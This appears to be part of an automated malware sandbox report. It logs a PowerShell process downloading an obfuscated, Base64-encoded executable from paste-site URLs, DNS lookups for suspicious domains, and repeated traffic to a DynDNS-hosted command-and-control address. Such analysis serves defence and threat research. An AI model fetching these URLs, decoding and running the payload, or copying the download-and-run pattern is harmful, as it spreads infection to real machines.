                                                            Sep 24, 2024 23:43:29.544650078 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.551403999 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.551450968 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.558043003 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.558176041 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.563064098 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.563155890 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.567961931 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.568017006 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.574196100 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.574245930 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.579157114 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.579412937 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.584217072 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.584765911 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.589571953 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.589663029 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.604573011 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.604746103 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.609633923 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.612118006 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.616938114 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.616991043 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.621856928 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.621931076 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.626718998 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.629479885 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.634253025 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.634320974 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.639287949 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.641756058 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.646574020 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.646624088 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.651401997 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.654254913 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.659224987 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.659347057 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.664278030 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.664383888 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.669122934 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.696785927 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.701864958 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.701968908 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.706840038 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.706949949 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.711927891 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.712802887 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.717675924 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.717756033 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.722879887 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.723112106 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.728090048 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.728149891 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.732933998 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.733042955 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.737895012 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.737966061 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.743060112 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.745379925 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.750204086 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.750253916 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.755013943 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.755085945 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.759874105 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.759943962 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.764801979 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.764883995 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.769678116 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.770174980 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.774972916 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.775156975 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.780139923 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.795804024 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.800657034 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.802248955 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.807054996 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.834732056 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.839545965 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.847551107 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.852319002 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.891818047 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.896698952 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.901106119 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.906291008 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.930283070 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.935147047 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.935245037 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.940099955 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.940259933 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.945008993 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.945085049 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.949918985 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.949995995 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.954834938 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.978199959 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.993417978 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:29.993521929 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:29.998894930 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.000207901 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.005369902 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.005501986 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.011569977 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.011799097 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.016907930 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.017105103 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.022165060 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.022324085 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.027782917 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.027879953 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.032885075 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.058638096 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.063865900 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.068095922 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.277554035 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.384910107 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.536659956 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.536746025 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.537117958 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.537957907 CEST561452054192.168.2.546.246.14.5
                                                            Sep 24, 2024 23:43:30.538861990 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.541652918 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.583194971 CEST20545614546.246.14.5192.168.2.5
                                                            Sep 24, 2024 23:43:30.588375092 CEST561452054192.168.2.546.246.14.5
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 24, 2024 23:42:03.117324114 CEST5782753192.168.2.51.1.1.1
                                                            Sep 24, 2024 23:42:03.626940966 CEST53578271.1.1.1192.168.2.5
                                                            Sep 24, 2024 23:42:06.262870073 CEST5310453192.168.2.51.1.1.1
                                                            Sep 24, 2024 23:42:06.271562099 CEST53531041.1.1.1192.168.2.5
                                                            Sep 24, 2024 23:42:15.524348974 CEST6083753192.168.2.51.1.1.1
                                                            Sep 24, 2024 23:42:15.531218052 CEST53608371.1.1.1192.168.2.5
                                                            Sep 24, 2024 23:42:21.110272884 CEST53592471.1.1.1192.168.2.5
                                                            Sep 24, 2024 23:42:23.859859943 CEST5709153192.168.2.51.1.1.1
                                                            Sep 24, 2024 23:42:23.964696884 CEST53570911.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Sep 24, 2024 23:42:03.117324114 CEST192.168.2.51.1.1.10x689bStandard query (0)ftp.desckvbrat.com.brA (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:06.262870073 CEST192.168.2.51.1.1.10x7c82Standard query (0)pastecodeapp.vercel.appA (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:15.524348974 CEST192.168.2.51.1.1.10xa9ceStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:23.859859943 CEST192.168.2.51.1.1.10xd5daStandard query (0)notificadoresrma.duckdns.orgA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Sep 24, 2024 23:42:03.626940966 CEST1.1.1.1192.168.2.50x689bNo error (0)ftp.desckvbrat.com.brdesckvbrat.com.brCNAME (Canonical name)IN (0x0001)false
                                                            Sep 24, 2024 23:42:03.626940966 CEST1.1.1.1192.168.2.50x689bNo error (0)desckvbrat.com.br191.252.83.213A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:06.271562099 CEST1.1.1.1192.168.2.50x7c82No error (0)pastecodeapp.vercel.app76.76.21.22A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:06.271562099 CEST1.1.1.1192.168.2.50x7c82No error (0)pastecodeapp.vercel.app76.76.21.93A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:15.531218052 CEST1.1.1.1192.168.2.50xa9ceNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:15.531218052 CEST1.1.1.1192.168.2.50xa9ceNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:15.531218052 CEST1.1.1.1192.168.2.50xa9ceNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Sep 24, 2024 23:42:23.964696884 CEST1.1.1.1192.168.2.50xd5daNo error (0)notificadoresrma.duckdns.org46.246.14.5A (IP address)IN (0x0001)false
                                                            • pastecodeapp.vercel.app
                                                            • pastebin.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54970676.76.21.224431088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:06 UTC120OUTGET /pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw HTTP/1.1
                                                            Host: pastecodeapp.vercel.app
                                                            Connection: Keep-Alive
                                                            2024-09-24 21:42:07 UTC463INHTTP/1.1 200 OK
                                                            Age: 0
                                                            Cache-Control: public, max-age=0, must-revalidate
                                                            Content-Type: text/plain;charset=UTF-8
                                                            Date: Tue, 24 Sep 2024 21:42:06 GMT
                                                            Server: Vercel
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch
                                                            X-Matched-Path: /pastes/[id]/raw
                                                            X-Vercel-Cache: MISS
                                                            X-Vercel-Id: iad1::fra1::b47t7-1727214126879-f140305e99b0
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-09-24 21:42:07 UTC2372INData Raw: 34 30 30 30 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                            Data Ascii: 4000TVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
                                                            2024-09-24 21:42:07 UTC1724INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                            Data Ascii: :::I:::C:::::::::::::::CC:::Eg::::::::::::
                                                            2024-09-24 21:42:07 UTC4744INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f e2 86 93 3a e2 86 93 45 7a e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 45 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                                            Data Ascii: ::::::::::::::::::::::::BooCg::Bio:Ez:D:E8::::::
                                                            2024-09-24 21:42:07 UTC5930INData Raw: 49 46 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 64 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 6f 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 6f 66 43 7a 68 7a 2f 76 2f 2f 42 69 67 62 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4c 54 5a 79 35 e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 63 42 73 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 67 5a 79 43 67 59 e2 86 93 3a e2 86 93 63 42 30 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 67 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 68 59 56 4b e2 86 93 3a e2 86 93 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6d 48 77 77 34 50 2f 37 2f 2f
                                                            Data Ascii: IF:H:dK:s:::YoC:::CgofCzhz/v//Bigb:::KLTZy5:U:cBsoCw::BgZyCgY:cB0oCw::BigN:::KFhYVK:4:::omHww4P/7//
                                                            2024-09-24 21:42:07 UTC1620INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 69 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 78 54 2b e2 86 93 3a e2 86 93 53 31 64 42 33 4d 7a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 49 58 4a 68 6a 57 76 59 70 39 37 6c 4b 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 68 49 71 35 2b 50 4c 79 6d 4f 7a 4d 6f 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6d 38 31 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 6e 4d 32 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 6e 4d 33 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 63 7a 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                            Data Ascii: ::DiE::::BxT+:S1dB3Mz:::KIXJhjWvYp97lKDQ:::ohIq5+PLymOzMoN:::Cm81:::KFnM2:::KFnM3:::Kczg:::
                                                            2024-09-24 21:42:07 UTC2INData Raw: 0d 0a
                                                            Data Ascii:
                                                            2024-09-24 21:42:07 UTC4096INData Raw: 34 30 30 30 0d 0a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 30 64 56 53 55 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 73 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6b e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 4e 43 62 47 39 69 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 58 46 51 49 49 43 51 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                            Data Ascii: 4000::Q::::I0dVSUQ::::sFQ::k:I::CNCbG9i::::::::::I:::FXFQIICQE:::
                                                            2024-09-24 21:42:07 UTC10674INData Raw: 43 35 e2 86 93 3a e2 86 93 46 49 e2 86 93 3a e2 86 93 69 67 42 35 e2 86 93 3a e2 86 93 4d 4d 43 6a 77 44 42 e2 86 93 3a e2 86 93 44 6f 46 6c 51 42 35 e2 86 93 3a e2 86 93 43 55 47 6d 77 42 35 e2 86 93 3a e2 86 93 4f 6f 43 6f 51 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 45 49 77 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 4c 51 e2 86 93 3a e2 86 93 70 67 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 44 49 77 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 4f 6b e2 86 93 3a e2 86 93 49 77 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 49 4d 47 72 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 e2 86 93 3a e2 86 93 46 45 42 74 e2 86 93 3a e2 86 93 44 52 e2 86 93 3a e2 86 93 46 6b 42 42 e2 86 93 3a e2 86 93 44 5a e2
                                                            Data Ascii: C5:FI:igB5:MMCjwDB:DoFlQB5:CUGmwB5:OoCoQ:R::QEIw:R:LQ:pg:x::cDIw:x:Ok:Iw:R:IMGr::R:FEBt:DR:FkBB:DZ
                                                            2024-09-24 21:42:07 UTC1620INData Raw: e2 86 93 2f 4e 6d 43 2b 71 42 62 39 4e 6c 33 6b 76 55 4d 78 63 66 34 65 67 65 35 75 48 35 43 47 55 2f 6d 6c 4d 46 61 48 63 6a 65 2b 65 4d 54 4c 51 30 37 59 4c 2f 50 46 38 52 51 36 63 7a 32 56 71 42 6a 49 52 79 53 4a 65 6c 74 4b 44 6d 6e 48 42 35 4b 4f 51 54 4f 2f 69 6e 51 4a 4f 35 70 2b 50 74 e2 86 93 3a e2 86 93 4d 2f 31 4f 52 77 2f 33 71 78 4d 54 56 37 59 6c 52 71 53 66 35 35 52 38 31 72 7a 58 32 68 6c 44 79 2f 53 35 46 6f 39 39 52 59 75 49 6a 78 59 52 4b 59 62 42 68 69 64 78 50 43 4c 39 63 70 79 34 6e 61 76 48 69 6c 47 4e 71 58 39 52 32 71 4f 76 63 49 62 32 6c 42 79 36 78 79 71 31 62 6a 49 34 55 62 76 38 57 45 72 45 70 72 33 47 48 4e 6b 55 7a 65 33 58 66 46 6b 72 67 34 37 30 46 36 71 51 71 79 47 39 69 63 52 52 48 51 4a 49 2b 58 64 63 4f 70 78 4f 61 32
                                                            Data Ascii: /NmC+qBb9Nl3kvUMxcf4ege5uH5CGU/mlMFaHcje+eMTLQ07YL/PF8RQ6cz2VqBjIRySJeltKDmnHB5KOQTO/inQJO5p+Pt:M/1ORw/3qxMTV7YlRqSf55R81rzX2hlDy/S5Fo99RYuIjxYRKYbBhidxPCL9cpy4navHilGNqX9R2qOvcIb2lBy6xyq1bjI4Ubv8WErEpr3GHNkUze3XfFkrg470F6qQqyG9icRRHQJI+XdcOpxOa2
                                                            2024-09-24 21:42:07 UTC2INData Raw: 0d 0a
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54970876.76.21.224431088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-24 21:42:09 UTC96OUTGET /pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw HTTP/1.1
                                                            Host: pastecodeapp.vercel.app
                                                            2024-09-24 21:42:10 UTC463INHTTP/1.1 200 OK
                                                            Age: 0
                                                            Cache-Control: public, max-age=0, must-revalidate
                                                            Content-Type: text/plain;charset=UTF-8
                                                            Date: Tue, 24 Sep 2024 21:42:10 GMT
                                                            Server: Vercel
                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                            Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch
                                                            X-Matched-Path: /pastes/[id]/raw
                                                            X-Vercel-Cache: MISS
                                                            X-Vercel-Id: iad1::fra1::cj2lv-1727214129996-c132124cacc7
                                                            Connection: close
                                                            Transfer-Encoding: chunked
                                                            2024-09-24 21:42:10 UTC2372INData Raw: 34 30 30 30 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                            Data Ascii: 4000TVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
